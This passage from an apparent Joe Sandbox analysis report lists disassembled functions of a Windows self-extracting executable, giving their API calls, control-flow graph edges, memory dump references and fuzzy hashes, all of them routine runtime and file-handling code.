                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentVariable
                                                                                              • String ID: sfxcmd$sfxpar
                                                                                              • API String ID: 1431749950-3493335439
                                                                                              • Opcode ID: 44f7083447d7afb38c5bb7674e571573068d0549dd20e7105fb03ee40d815d36
                                                                                              • Instruction ID: f1e191425bc3e1b91b6e20fcf4e2fe5d10b4f39f0754ecd775294a8a7b736170
                                                                                              • Opcode Fuzzy Hash: 44f7083447d7afb38c5bb7674e571573068d0549dd20e7105fb03ee40d815d36
                                                                                              • Instruction Fuzzy Hash: 00F065B2505235ABDB202F959C0AFFF7F98BF15B82F040466BE8796151E6B08940E6B1
                                                                                              Function 00CA9785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1082 ca9785-ca9791 1083 ca979e-ca97b5 ReadFile 1082->1083 1084 ca9793-ca979b GetStdHandle 1082->1084 1085 ca9811 1083->1085 1086 ca97b7-ca97c0 call ca98bc 1083->1086 1084->1083 1087 ca9814-ca9817 1085->1087 1090 ca97d9-ca97dd 1086->1090 1091 ca97c2-ca97ca 1086->1091 1093 ca97ee-ca97f2 1090->1093 1094 ca97df-ca97e8 GetLastError 1090->1094 1091->1090 1092 ca97cc 1091->1092 1095 ca97cd-ca97d7 call ca9785 1092->1095 1097 ca980c-ca980f 1093->1097 1098 ca97f4-ca97fc 1093->1098 1094->1093 1096 ca97ea-ca97ec 1094->1096 1095->1087 1096->1087 1097->1087 1098->1097 1100 ca97fe-ca9807 GetLastError 1098->1100 1100->1097 1102 ca9809-ca980a 1100->1102 1102->1095
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00CA9795
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00CA97AD
                                                                                              • GetLastError.KERNEL32 ref: 00CA97DF
                                                                                              • GetLastError.KERNEL32 ref: 00CA97FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                              • String ID:
                                                                                              • API String ID: 2244327787-0
                                                                                              • Opcode ID: ca3a567687b76b76af4f41e8ba87fc60261d40bf4bd4b8168d4b00c54f741bec
                                                                                              • Instruction ID: 34b35ffb78987b836f174d5fc48e3209f09954d5739ec27d7d5b09daa75bc3cd
                                                                                              • Opcode Fuzzy Hash: ca3a567687b76b76af4f41e8ba87fc60261d40bf4bd4b8168d4b00c54f741bec
                                                                                              • Instruction Fuzzy Hash: A7118E30910206EBDF209F65C806B6D37B9FB43728F20892AF426C51D0D7789F44DB62
                                                                                              Function 00CCAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00CC3F73,00000000,00000000,?,00CCACDB,00CC3F73,00000000,00000000,00000000,?,00CCAED8,00000006,FlsSetValue), ref: 00CCAD66
                                                                                              • GetLastError.KERNEL32(?,00CCACDB,00CC3F73,00000000,00000000,00000000,?,00CCAED8,00000006,FlsSetValue,00CD7970,FlsSetValue,00000000,00000364,?,00CC98B7), ref: 00CCAD72
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CCACDB,00CC3F73,00000000,00000000,00000000,?,00CCAED8,00000006,FlsSetValue,00CD7970,FlsSetValue,00000000), ref: 00CCAD80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: 651da0135e84193e332c5252a3db2e2b0a4fa19ceefe218e35cb2142429a9a11
                                                                                              • Instruction ID: 553ae48909d9c9e812a16b72adcf0341c3d544859babc53c75bdc88cb6b9f974
                                                                                              • Opcode Fuzzy Hash: 651da0135e84193e332c5252a3db2e2b0a4fa19ceefe218e35cb2142429a9a11
                                                                                              • Instruction Fuzzy Hash: D301473260222AABC7214B79EC4CF5B7B98EF00BA67100229F817D3550DB20DD0186E2
                                                                                              Function 00CA9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00CAD343,00000001,?,?,?,00000000,00CB551D,?,?,?), ref: 00CA9F9E
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00CB551D,?,?,?,?,?,00CB4FC7,?), ref: 00CA9FE5
                                                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00CAD343,00000001,?,?), ref: 00CAA011
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$Handle
                                                                                              • String ID:
                                                                                              • API String ID: 4209713984-0
                                                                                              • Opcode ID: eddba78c8b4b6365e787c04116d073a608cf3749794dd66e826186f921368c03
                                                                                              • Instruction ID: 5575dd3a5c3a25e7b3f2a1ccbf6ee87316e5503082fc808df92a6160f1809a97
                                                                                              • Opcode Fuzzy Hash: eddba78c8b4b6365e787c04116d073a608cf3749794dd66e826186f921368c03
                                                                                              • Instruction Fuzzy Hash: FF31E23120434AAFDB14CF24D809B6EB7A5FF86719F04451DF99297290C775AE48CBA3
                                                                                              Function 00CAA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00CAC27E: _wcslen.LIBCMT ref: 00CAC284
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA2D9
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA30C
                                                                                              • GetLastError.KERNEL32(?,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA329
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2260680371-0
                                                                                              • Opcode ID: cd4bee3eb3a3c3569b87885c8190e285c1245200c7b83cd87b856870ae57b2ba
                                                                                              • Instruction ID: 7e0c7a03323bf1c8a32cb918d47633cd36790c9c1fbd9455507c9e8618236e69
                                                                                              • Opcode Fuzzy Hash: cd4bee3eb3a3c3569b87885c8190e285c1245200c7b83cd87b856870ae57b2ba
                                                                                              • Instruction Fuzzy Hash: 6F01F7312022126AEF31AB754C49BFD3798AF0B789F044416F912E60A1D764DB81D6B7
                                                                                              Function 00CCB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00CCB8B8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Info
                                                                                              • String ID:
                                                                                              • API String ID: 1807457897-3916222277
                                                                                              • Opcode ID: 6c41aa06ee53d33018261184b9ea2846c7a1d8fcfa912aeeaddd926262f0469c
                                                                                              • Instruction ID: 35ba1e674e64f49a5df0fc87a8aaa5edf15bbd6896036090f3d85c4e76fa07ed
                                                                                              • Opcode Fuzzy Hash: 6c41aa06ee53d33018261184b9ea2846c7a1d8fcfa912aeeaddd926262f0469c
                                                                                              • Instruction Fuzzy Hash: FE41F67050428C9ADF218EA5CC85FEABBB9EB45304F1404EDE5DAC6142D335AE469B60
                                                                                              Function 00CCAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00CCAFDD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: String
                                                                                              • String ID: LCMapStringEx
                                                                                              • API String ID: 2568140703-3893581201
                                                                                              • Opcode ID: 4a747d107bb871ad10b3f0602ae1c44bbc20e20a3cd43ee765bcfd7ee2a54a44
                                                                                              • Instruction ID: dac727fe3992756c7fb12c2f1f32220721f276d8c0dcd5f4cb405abc965d7bab
                                                                                              • Opcode Fuzzy Hash: 4a747d107bb871ad10b3f0602ae1c44bbc20e20a3cd43ee765bcfd7ee2a54a44
                                                                                              • Instruction Fuzzy Hash: 3B014C3250510DBBCF026F90DC05EEE7F62EF08754F01425AFE1466261C6728A31EB81
                                                                                              Function 00CCAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00CCA56F), ref: 00CCAF55
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                              • API String ID: 2593887523-3084827643
                                                                                              • Opcode ID: 61a3599f8fdadf73d6b75d71f4d6a42423ec63176d957921e5bc7d3d12dd1385
                                                                                              • Instruction ID: f8f0538449bb044e5f4bd483c9df1f43f6fcd7557c4b64606765a2899ec05608
                                                                                              • Opcode Fuzzy Hash: 61a3599f8fdadf73d6b75d71f4d6a42423ec63176d957921e5bc7d3d12dd1385
                                                                                              • Instruction Fuzzy Hash: F5F0B43264621CBFCF026F50CC1AE9D7F61EF04711F40416AFD099A360EA314A10A786
                                                                                              Function 00CCADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Alloc
                                                                                              • String ID: FlsAlloc
                                                                                              • API String ID: 2773662609-671089009
                                                                                              • Opcode ID: 0ad728546c387cf2d2426a2c060b3c3789e2867b08a2f9528dd9be7f654fc6d3
                                                                                              • Instruction ID: 94ae5c6869b4db779ccb4566efea84c08086f339538c5e3cf6aeebcfa5f1bac9
                                                                                              • Opcode Fuzzy Hash: 0ad728546c387cf2d2426a2c060b3c3789e2867b08a2f9528dd9be7f654fc6d3
                                                                                              • Instruction Fuzzy Hash: 91E0E532A8621C7BC601AB65DC1AF6EBB94DB04721B4102AEF90697340DD715E1196DA
                                                                                              Function 00CBEAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBEAF9
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: 3Ro
                                                                                              • API String ID: 1269201914-1492261280
                                                                                              • Opcode ID: fa416d7b8da026fc1e6f1f3752d7f682778d54c790f454549d5f0d539abe8c50
                                                                                              • Instruction ID: 021770638c5dd6bdfd92bdb09e37d73dff09b89c870cdf214e942e098575e569
                                                                                              • Opcode Fuzzy Hash: fa416d7b8da026fc1e6f1f3752d7f682778d54c790f454549d5f0d539abe8c50
                                                                                              • Instruction Fuzzy Hash: 70B012C629B4437C3908A2061E42CF7090DC4C0F90730803FF504C41C1DC814C026471
                                                                                              Function 00CCBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00CCB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CCBA44,?), ref: 00CCB7E6
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00CCBA89,?,00000000), ref: 00CCBC64
                                                                                              • GetCPInfo.KERNEL32(00000000,00CCBA89,?,?,?,00CCBA89,?,00000000), ref: 00CCBC77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CodeInfoPageValid
                                                                                              • String ID:
                                                                                              • API String ID: 546120528-0
                                                                                              • Opcode ID: 757025bc3e4f877b919ec3571e8b83dd9f2a4cb2765b6be72bb7a57fdcac0564
                                                                                              • Instruction ID: 977381dbbbd8e00518c623df280d3d073a3020cc2a03f5ea096720697be780e7
                                                                                              • Opcode Fuzzy Hash: 757025bc3e4f877b919ec3571e8b83dd9f2a4cb2765b6be72bb7a57fdcac0564
                                                                                              • Instruction Fuzzy Hash: 0F513470D002559EDB209FF5C892FBABBE4EF41310F1844AED4A68B292D7359E46DB90
                                                                                              Function 00CA9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00CA9A50,?,?,00000000,?,?,00CA8CBC,?), ref: 00CA9BAB
                                                                                              • GetLastError.KERNEL32(?,00000000,00CA8411,-00009570,00000000,000007F3), ref: 00CA9BB6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: a6911dc62e7ea2487d6642fef465f896f9d048dd987071edd187a1614696d68c
                                                                                              • Instruction ID: 8326a9fa10847b2be58e35ee6c3387fa97d6c916d03bf65f0100788cebc6d5e6
                                                                                              • Opcode Fuzzy Hash: a6911dc62e7ea2487d6642fef465f896f9d048dd987071edd187a1614696d68c
                                                                                              • Instruction Fuzzy Hash: E541CF305043438FDB34DF15F5865AAB7E5FBD6718F148A2EE8A283260D770AE458B61
                                                                                              Function 00CCBA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00CC97E5: GetLastError.KERNEL32(?,00CE1030,00CC4674,00CE1030,?,?,00CC3F73,00000050,?,00CE1030,00000200), ref: 00CC97E9
                                                                                                • Part of subcall function 00CC97E5: _free.LIBCMT ref: 00CC981C
                                                                                                • Part of subcall function 00CC97E5: SetLastError.KERNEL32(00000000,?,00CE1030,00000200), ref: 00CC985D
                                                                                                • Part of subcall function 00CC97E5: _abort.LIBCMT ref: 00CC9863
                                                                                                • Part of subcall function 00CCBB4E: _abort.LIBCMT ref: 00CCBB80
                                                                                                • Part of subcall function 00CCBB4E: _free.LIBCMT ref: 00CCBBB4
                                                                                                • Part of subcall function 00CCB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CCBA44,?), ref: 00CCB7E6
                                                                                              • _free.LIBCMT ref: 00CCBA9F
                                                                                              • _free.LIBCMT ref: 00CCBAD5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2991157371-0
                                                                                              • Opcode ID: 0aa05f4efde5c916709959787294f2dc7c52eea238b1a0dab8dd1136dbdd7147
                                                                                              • Instruction ID: 2ac9841de90c678c7fc9d914c852aca8e6e3e50586e18738530482f033867ee2
                                                                                              • Opcode Fuzzy Hash: 0aa05f4efde5c916709959787294f2dc7c52eea238b1a0dab8dd1136dbdd7147
                                                                                              • Instruction Fuzzy Hash: 0131B631904209AFDB10EFE9D446F9DB7F5EF40320F25409EE9549B2A2EB329E45EB50
                                                                                              Function 00CA1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA1E55
                                                                                                • Part of subcall function 00CA3BBA: __EH_prolog.LIBCMT ref: 00CA3BBF
                                                                                              • _wcslen.LIBCMT ref: 00CA1EFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2838827086-0
                                                                                              • Opcode ID: d3543707c85aac9dabacb2b2620d9e7067afafccd770ab7e3761d7d9258e02d4
                                                                                              • Instruction ID: ec4268c25746a2dc193b7fef3fca47dd43f184ae0746ea50b409f9e658b91bdf
